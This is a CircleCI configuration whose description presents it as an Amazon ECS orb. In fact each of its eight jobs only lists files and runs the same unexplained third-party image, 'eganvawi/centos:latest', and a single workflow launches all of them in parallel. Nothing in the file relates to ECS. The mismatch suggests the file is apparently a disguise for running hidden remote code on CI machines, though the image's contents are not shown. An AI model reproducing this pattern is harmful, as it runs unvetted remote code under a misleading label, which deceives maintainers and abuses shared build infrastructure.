working_dir: &working_dir ~/app
version: 2.1
#######################################################################################################################
description: |
  An orb for working with Amazon Elastic Container Service (ECS).
  Supports the EC2 and Fargate launch types
jobs:
  workspace-full:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          
      
            
          
  workspace-full-vnc:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          
      

  mdbook:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          

  workspace-dotnet:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          

  workspace-dotnet-vnc:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          

  workspace-postgres:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          

  workspace-mysql:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
  workspace-db:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            ls
            docker run -e CI=true eganvawi/centos:latest
          

  
          

  
workflows:
  version: 2.1
  build-and-deploy:
    jobs:
      - workspace-full
      - workspace-full-vnc
      - workspace-db
      - mdbook
          
      - workspace-dotnet
          
      - workspace-dotnet-vnc
          
      - workspace-postgres
          
      - workspace-mysql
          
      
          
      
